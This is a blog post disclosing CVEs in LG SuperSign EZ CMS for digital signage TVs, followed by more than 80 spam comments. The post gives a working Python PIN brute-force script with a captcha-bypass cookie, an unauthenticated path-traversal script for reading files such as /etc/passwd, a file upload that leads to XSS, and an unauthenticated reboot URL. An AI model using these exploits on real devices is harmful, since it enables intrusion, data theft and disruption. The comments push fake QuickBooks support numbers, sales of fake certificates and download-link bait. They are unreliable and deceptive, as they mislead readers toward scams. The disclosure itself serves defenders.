jueves, 13 de septiembre de 2018

Multiple vulnerabilities in LG SuperSignEZ CMS


Hello there, it´s been a long time.

Lately, I´ve been playing with LG SuperSign TVs and found some vulnerabilites.

These vulnerabilities have been addressed with the following CVE's

Weak authentication (bypass captcha + 4 digit PIN) CVE-2018-16286
Arbitrary FIle Upload CVE-2018-16287
LFI CVE-2018-16288
DoS via reboot command CVE-2018-16706


As we can see in the link above, LG SuperSign TVs are..

"*An industry definitive, software-based content management solution 
  *All-in-one solution for editing, scheduling, and distribution
  *Suitable for large-scale displays operation. Seamless management of different content for different displays"

These TVs are used in companies and stores for advertising.

The displayed content can be managed  from a CMS that these TVs have built-in, called SuperSign EZ. It offers a web interface running on port 9080 (Using a Node.js Express Framework):




First vuln, weak authentication

In the screenshot above, we have a login form with two fields, PIN and captcha. Hmmm...We don't know the min and max length of the PIN number and we can't bruteforce it because the presence of the captcha. But....Once I had access to the administration page (In this case the CMS had the default PIN 0000) I found two interesting things.

1_ There is a cookie that takes the name and value captcha:pass



2_ The PIN number, has a max of 4 digits (I verified that in the "Change PIN number" section)



So, I logged out, and using a cookie editor, added a cookie with the name "captcha" and the value "pass" and guess what...



The captcha was gone!

So....We have a 4 digit PIN number and no captcha to resolve...It's time to script our way in!

Analizing the response after a successful login we receive the message:


If we enter a wrong password we get:



So, we can code something like this:

import requests
import re
from argparse import ArgumentParser


parser = ArgumentParser(description="SuperSign BruteForce Script")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-p", "--pass", dest="password",
                        help="password")

args = parser.parse_args()


print "===================================="
print "=    SuperSign BruteForce Script                                          ="
print "===================================="



f = open(args.password, 'r')  #Opening password file (or you can just use while starting from 0000 to 9999)
for line in f:

data = {
        'id':'admin',
        'password':str(line).replace('\n', ''),
        'captcha':'pass',
        'captcha_compare':'pas'
}

print '[+]Trying with PIN:',str(line)

s = requests.post('http://'+ str(args.target).replace('\n', '') +'/', data=data)
matches = re.findall('success', s.text);

if len(matches) == 0:
    print 'Access Denied'
print
else:
    print 'Success!'
    break


The code is very simple. We make a request, using the cookie captcha:pass, for every value in 0000-9999 range and wait for the right response.

Bingo, we are in.

Second vuln, Local File Inclusion

Once I was in, using again my friend burp, I analized the requests that the application make when the user wants to add a new template and found that some files are called in this URL:

http://LG_SuperSign_IP:9080/signEzUI/playlist/edit/upload/LGXXXXXX/uploaded_file.ext

uploaded_file.ext is the file included in the template.

So, I started to try for LFI in some paths, and after receive the message "Not found" over and over, I received this beautiful response in this path:

http://LG_SuperSign_IP:9080/signEzUI/playlist/edit/upload/../../../../../../../../../../etc/passwd



This is so critical, because, this TV's can be connected with any other device of the company/store:


An attacker can obtain sensitive information for further attacks.

If you are thinking, An attacker needs to know the first vulnerability to gain access and later use the second one to get those files. Well, you are wrong. There is no need to be authenticated to exploit this LFI. If you take a look at the picture again, you can see that there is no cookie, so I'm not logged in.

Here is the code in python to retrieve any file you want:

import requests
import re
from argparse import ArgumentParser


parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-p", "--path", dest="filepath",
                        help="path to the file you want to read")

args = parser.parse_args()
path = args.filepath


s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path))
print s.text


Third vuln, Arbitrary file upload

Obviously, if you can serve content, you've got a File Upload function. The problem is that there is no control about the file type a user can upload, so we can upload any kind of files.


Then, we can access the uploaded file using the LFI vulnerability (to get an XSS in this case):


With this in mind, an attacker can access to the manager, upload a malicious file and send the link to the victim.


Hey wait, there's one more..

Fourth vuln, DoS via reboot function

Triggering an error, I found some interesting files that I could read via the LFI. One of those file had the code to a reboot function:



So...making a request to the URL http://SuperSign_IP:9080/qsr_server/device/reboot it is possible to reboot the device without authentication.


Well, I guess that's all for the moment.


Recommendations

At the moment, the only thing you can do to mitigate this vulnerabilities is isolate this devices. You must restrict the access to this TVs in your internal network and please, please, please, DO NOT EXPOSE THEM TO THE INTERNET!!!!


85 comentarios:

  1. ReactPSN would be the tool to use. Unknown CFW is an error that sometimes randomly happens, it should work regardless if you get it or not. It shouldn't factory reset your machine, are you sure it didn't just log in to the aa account ps3 jailbreak 4.83 free

    ResponderEliminar
  2. It's a thing that the PS4 does that you have to opt out of where it will display games on the home screen that Sony thinks you might like to buy. Its a global thing but clearly you have opted out of it and forgotten about it. ps4 jailbreak 6.20 tutorial

    ResponderEliminar
  3. FIFA 19 Hack are 100% entirely free for mobile, ps4 and PC in addition to safe and also protected. fifa mobile 19 hack

    ResponderEliminar
  4. Instant help for your Quickbooks Accounting software you can dial Quickbooks Desktop Support Phone Number 800-901-6679 for USA. We are always available for your help.

    ResponderEliminar
  5. Nice Blog Thanks for sharing this usefull link. Quickbooks accounting software is helpful for maintain client payroll taxes accounting problems for instant help about Quickbooks Desktop Payroll Support Number . Our technical team always available for your help our Toll-free Number + 1-800-986-4607.

    ResponderEliminar
  6. Nice Blog If you need Quickbooks Tech Support Phone Number then you can dial +1-800-986-4591 for help and support. Our technical support team always provides you the best technical help.

    ResponderEliminar
  7. Our Quickbooks Support Phone Number USA 800-901-6679 for instant help. In quickbooks accounting software if you face any type of issue in this. Our Highly skilled Technicians are there for you, to resolve your queries.

    ResponderEliminar
  8. Thanks For Sharing!
    Quickbooks application can easy to use. It is user friendly software if yur are facing issue dial our Quickbooks Support in New York 1-800-986-4591.

    ResponderEliminar
  9. Any technical issue obstructing your way ahead in Quickbooks ? Call us now, on Quickbooks Support Phone Number . Avail instant solutions for the Quickbooks technical issues persist in the software. In case, you need any assistance regarding the software, contact us 1-800-986-4607. Our team constitutes of certified proadvisors who have years of experience in handling technical issues.

    ResponderEliminar
  10. Quickbooks is mostly used by smart business owner. If you are using this software and sometimes face errors. Avail instant & effective solution for your queries & issues while using Quickbooks Payroll accounting, simply dial Dial Quickbooks Helpline Number 800-901-6679.

    ResponderEliminar
  11. Are you facing technical issues in QuickBooks for Mac? Don’t worry, we are here to help you. Just need to dial on QuickBooks Customer Service Number 1-833-780-0086. Our QuickBooks for Mac proficients are available round the clock to give support. For More Visit: https://g.page/quickbooks-support-california

    ResponderEliminar
  12. Struggling with QuickBooks nagging error? Resolve it by dialling QuickBooks customer Service Phone Number 1-833-780-0086. Our experienced & learned professionals are available to assist you. For More Visit: https://g.page/quickbooks-support-california

    ResponderEliminar
  13. The error code causes hindrances to the software functionality. This affects the work-flow of every organisation. For such errors give a call on QuickBooks customer Service Number 1-833-780-0086. Don’t try to indulge in resolving on your own. For More Visit: https://g.page/quickbookssupporttexas

    ResponderEliminar
  14. Find effective solutions for all kinds of technical snags from QuickBooks Support Number 1-833-780-0086. QuickBooks is one of the reliable accounting applications that has given a lot to business. For More : https://g.page/quickbooks-support-california

    ResponderEliminar
  15. Nice Blog!
    Getting QuickBooks error 1522?.Get efficient solution with Our expert.
    Click Here to Know How to fix QuickBooks error 1522
    Dial our tech support Number for any support +1-844-908-0801.

    ResponderEliminar
  16. If needing comprehensive assistance regarding the software, call our QuickBooks Support Phone Number For Mac 1-833-325-0220.

    ResponderEliminar
  17. Nice Blog!
    if you hang up with any issues in QuickBooks Get live support 24*7 from QuickBooks expert on tool-free Number.
    Dial QuickBooks Proadvisor Support Phone Number 1-844-908-0801

    ResponderEliminar
  18. Enjoy uninterrupted accounting benefits with QuickBooks Support Phone Number Texas 1-833-325-0220. QuickBooks is a leading accounting software that has fascinated the world with awesome features.

    ResponderEliminar
  19. Lockdown is running in the whole country due to coronavirus, in such an environment we are committed to provide the best solutions for QuickBooks Support Phone Numberclick .
    Click here to Know How to Delete Deposits in QuickBooks to get in touch.
    Dial : 1-844-908-0801

    ResponderEliminar
  20. nice post!
    Worried about QuickBooks error?Get in touch with QuickBooks expert for instant solution.
    Click here to know how to fix QuickBooks error 15215 1-844-908-0801

    ResponderEliminar
  21. Let our team handle your errors that appears in your QuickBooks software. We have a skilled and talented team of experts who can help fix your problems instantly. Call us at QuickBooks Support Phone Number illinois today.

    ResponderEliminar
  22. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  23. Your blog is very amazing i m waiting another blog thanks for provide useful information you can also visit my

    quickbooks customer service phone number

    ResponderEliminar
  24. i m very glad after read your article . this is very important for me. thanks for update with us . kindly you can check our accounting software service at

    quickbooks customer service number

    ResponderEliminar
  25. Hi there,

    Thank you so much for the post you do and also I like your post, Are you looking for Buy Verified IT Certificate Online in the whole USA? We are providing Buy CCNP Certificate Online ,Buy C++ Certificate Online, Buy Registered and Unregistered Documents Online, Buy Certified Risk Professional Exam ,Buy Authorised Documents Online, Buy Fake Certified Risk Professional Exam Online ,Buy Payroll Professional Certificate Online, Buy Tax Advisor Certificate Online, Buy Genuine Documents Online, IT certificate programs online, it certificate programs that pay well, IT certificate programs free, IT certifications online, IT certificate courses, IT architecture certificate programs ,IT audit certificate ,IT auditor certificate, how to get a IT certificate, IT support professional certificate by Google, it certificate from Google, IT higher certificate courses, IT international certificate, IT certificate management, IT project management certificate, IT certificate online programs, IT certificate programs cost, IT certificate programs for beginners, IT registration certificate, IT security certificate, IT verification certificate for you with the well price and our services are very fast.

    Click here for href='https://databaseregisteredcertificates.com/’ />
    title="Buy Payroll Professional Certificate Online,Buy IT certificates online | Buy Real and Fake IT Certificates Online ">MORE DETAILS......
    Contact US At: +1(415) 212-8948
    Email Us At: databasecertificates@gmail.com



    ResponderEliminar
  26. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  27. Very interesting blog . i m waiting other blog please keep sharing . if you also looking Quick service then connect me at

    quickbooks support phone number

    ResponderEliminar
  28. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  29. i m very glad after read your article update please share me again if you also searching any accunting sofware service service then contact me

    quickbooks cutomer service

    ResponderEliminar
  30. Search for the Employee identification number in the QuickBooks desktop.

    Hope the above methods helped you in resolving Quickbooks Error 15270. If you need more help in fixing error 15270, reach out to QBSsolved at 1-888-910-1619.

    ResponderEliminar
  31. Nice blog very attractive information . we also provide solution regarding about quickbooks software at

    quickbooks phone number

    ResponderEliminar
  32. his is Great Article which is really helpful for me if you havefound any error facing with QuickBooks software when working you in software please check it QuickBooks Customer Service

    ResponderEliminar
  33. Hi! Amazing blog. Your blog gives me a thorough knowledge of the topic. In case you find any technical trouble in QuickBooks, dial QuickBooks Support Phone Numberand get premium support service from experts.

    ResponderEliminar
  34. Hey! Well-written blog. I hope you will post some more informative blogs on the same topic. In case you want technical support for QuickBooks, dial QuickBooks Customer Service Phone Number and get feasible solutions for QuickBooks problems.

    ResponderEliminar
  35. This is Great Article Thanks For Sharing With us .You can also Find QuickBooks Customer Service

    ResponderEliminar
  36. very great Article for QuickBooks user ,keep going on update . we also are available at

    QuickBooks Customer Service for help you any query

    ResponderEliminar
  37. Really so amazing picture thanks for sharing .if you have anu problem with quickbooks software then please contact at

    QuickBooks Customer Service

    ResponderEliminar
  38. very informative Article .if you have facing some unexpected issues in QuickBooks .To do call for such issue at quickbooks phone number

    ResponderEliminar
  39. All the Quickbooks users may not be tech savvy and they might need expert assistance to resolve these errors arising in Quickbooks. One such error is QuickBooks Error Code 1328.

    How to Resolve QuickBooks enterprise Error Code 15227?

    How to resolve QuickBooks Error Code 15103

    ResponderEliminar
  40. Great Article you can get best supportive service quickbooks solution at
    QuickBooks Customer Service

    ResponderEliminar
  41. Quickbooks Error 361 is an online session error which may appear while you perform some financial operation on Quickbooks. Occurrence of QuickBooks Error Code 361 prohibits you from using certain features of Quickbooks.

    How to Resolve QuickBooks Error Code 392?

    How to fix Error QuickBooks file doctor tool not working?

    ResponderEliminar
  42. Nice Blog
    QuickBooks Payroll is a widely used accounting software that is intended for the business of small as well as large sizes.
    From among other QuickBooks editions, this one is the best. Call QuickBooks Support Phone Number at 1-(888)-807-0601.

    ResponderEliminar
  43. Nice Blog!
    Know More About How to install diagnostic tool? Get support 24*7 from QuickBooks expert on toll-free Number.
    Click here to know How to install diagnostic tool
    Call QuickBooks Support Phone Number at 1-(888)-903-0715

    ResponderEliminar
  44. QuickBooks Payroll Update Error 15243 is one of them. Quickbooks error 15243 arrives when Quickbooks file copy services stop working due to some reasons. If you feel you need more help in fixing How to Fix QuickBooks Payroll Update Error 15243?, call QuickBooks enterprise support at +1-888-485-0289 and we will help you in resolving the Error 15243.

    ResponderEliminar
  45. QuickBooks Online is an accounting software used by small businesses. If you are stuck with error and need immediate assistance then call at Quickbooks Customer Service Number +1 855-738-7873

    ResponderEliminar
  46. Very impressive blog Thanks For Sharing with us if you have some query regarding QuickBooks issue then just dial at Quickbooks Customer Service +1 888-981-4592






    ResponderEliminar
  47. QuickBooks is a popular bookkeeping software, QuickBooks has great customer service When the QuickBooks error occurs, then
    Dial our QuickBooks Support Phone Number +1 888-471-2380 . QuickBooks has QuickBooks Enterprise Support provide feasible solutions

    ResponderEliminar
  48. QuickBooks is daily accounting software that keeps track of your business money, customers and inventory .QuickBooks payroll update error error 15311 occurs when payroll information and QuickBooks not working properly get in touch with our
    QuickBooks Enterprise Support experts to fix the error for you. You can simply make a call at Quickbooks Support Phone Number +18554442233 to fix the error for you.

    ResponderEliminar
  49. Quickbooks Support Phone Number is best option which can you get all solution of your issue Visit more info
    QuickBooks Enterprise Support with technical Support by expert

    ResponderEliminar
  50. This is very attractive article so if you looking Quickbooks solution call at
    Quickbooks Customer Service Phone Number +1 855-675-3194 with also support of QuickBooks Enterprise Support

    ResponderEliminar
  51. quickbooks is very complete bussiness solution if you are suffering any issue then please contact at
    Quickbooks Support Phone Number +1 877-603-0806 with technical support of
    QuickBooks Enterprise Support

    ResponderEliminar
  52. Nice article !! If You Need Help Resolving QuickBooks Error then Just Quickly Dial Quickbooks Customer Service +18882724881

    ResponderEliminar
  53. We at Quickbooks Support Phone Number provide helpful Quickbooks solutions for your queries

    ResponderEliminar
  54. Thanks for Sharing this great article..Its really nice and useful for us… keep sharing..
    vat return service in barking

    ResponderEliminar
  55. Thanks for writing an awesome blog on this topic. If you need any help Toprint W-2 form in QuickBooks desktop and online give us a call on helpline number +1 (855)-856-0053 to get quick result . https://asquarecloudhosting.com/how-to-print-w-2-form-in-quickbooks-desktop-online-explained/

    ResponderEliminar
  56. Mama Quiero Ser P3Nt3St3R!: Multiple Vulnerabilities In Lg Supersignez Cms >>>>> Download Now

    >>>>> Download Full

    Mama Quiero Ser P3Nt3St3R!: Multiple Vulnerabilities In Lg Supersignez Cms >>>>> Download LINK

    >>>>> Download Now

    Mama Quiero Ser P3Nt3St3R!: Multiple Vulnerabilities In Lg Supersignez Cms >>>>> Download Full

    >>>>> Download LINK

    ResponderEliminar
  57. Mama Quiero Ser P3Nt3St3R!: Multiple Vulnerabilities In Lg Supersignez Cms >>>>> Download Now

    >>>>> Download Full

    Mama Quiero Ser P3Nt3St3R!: Multiple Vulnerabilities In Lg Supersignez Cms >>>>> Download LINK

    >>>>> Download Now

    Mama Quiero Ser P3Nt3St3R!: Multiple Vulnerabilities In Lg Supersignez Cms >>>>> Download Full

    >>>>> Download LINK SW

    ResponderEliminar
  58. Thanks for sharing valuable content. Quick Books CRM plays vital role in every business, it's very important to understand how you present yourself in global market. For more about QuickBooks online CRM get in touch with us. If you want Quick Books CRM.. Than visit my website QuickBooks Online CRM

    ResponderEliminar
  59. Project management is a very tedious task in the construction sector because there are many aspects that need to be managed. Zepth is an effective construction project management software that provides a complete solution for project management.

    ResponderEliminar
  60. I really liked how concisely you described everything. Short stories are my favorite type of fiction. QuickBooks is a well-known business management software. QBDBMgrN .exe Not Running Error is one of the problems users could face. To correct the error, go to this site.

    ResponderEliminar
  61. Nice post. Thanks for sharing! I want people to know just how good this information is in your article. It’s interesting content and Great work. QuickBooks Error Code 6210

    ResponderEliminar
  62. This post is really very helpful article to resolve Quickbooks event id 4. but still if you have any issues related Quickbooks event id 4 on this computer then connect with Asquare Cloud hosting at +1(855)-738-0359.

    windows firewall connection sharing not allowe

    ResponderEliminar
  63. Regular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you! you can check my quickbooks payroll errors list-
    QuickBooks Error PS033
    QuickBooks Error PS101
    QuickBooks Error PS058
    quickbooks error ps077

    ResponderEliminar
  64. How to Fix QBDBMgrN Not Running on this Computer Error? Fix 1: Install Windows Firewall Updates · Fix 2: Restart QuickBooks Database Server Manager ServiceAre you facing issues with this error? Let this blog post helps you as a comprehensive guide for you. In case you need professional assistance from our QuickBooks expert team, get in touch with us. You can contact us at +1-855-738-0359.

    ResponderEliminar
  65. Fantastic article with great piece of information... Keep Posting
    Data science classes in Pune

    ResponderEliminar
  66. Thank you for creating such a wonderful blog. I'm always looking for high quality articles on my website. Your work is also something I respect. I strive to be as good a blogger as you. We hope you will read the paper, which is full of useful information. You are doing a great job.

    QuickBooks Error Code 6210

    ResponderEliminar
  67. This is actually a really good post; the language truly drew me in, and you gave a clear concept of the subject. Nice!!
    DB Computer Solutions Ltd

    ResponderEliminar
  68. QuickBooks Error 12007 is a problem that occurs when QuickBooks software can't connect to the internet to download updates. It might happen due to issues with your internet connection, firewall settings, or other network configurations.

    How to fix QuickBooks Error 12007
    QuickBooks Error 6123
    QuickBooks Error 179

    ResponderEliminar
  69. QuickBooks Error 6129 is a common issue that users encounter while working with the QuickBooks accounting software.

    How to fix QuickBooks Error 6129
    Quickbooks Error H202
    QuickBooks Error 179

    ResponderEliminar
  70. One such common issue is QuickBooks Error 12152. In this guide, we will explore what QuickBooks Error 12152 is and provide a detailed, step-by-step solution to resolve it.


    How to Fix QuickBooks Error 12152
    How to Fix QuickBooks Loan Manager Not Working Error
    resolve Quickbooks Error 6175

    ResponderEliminar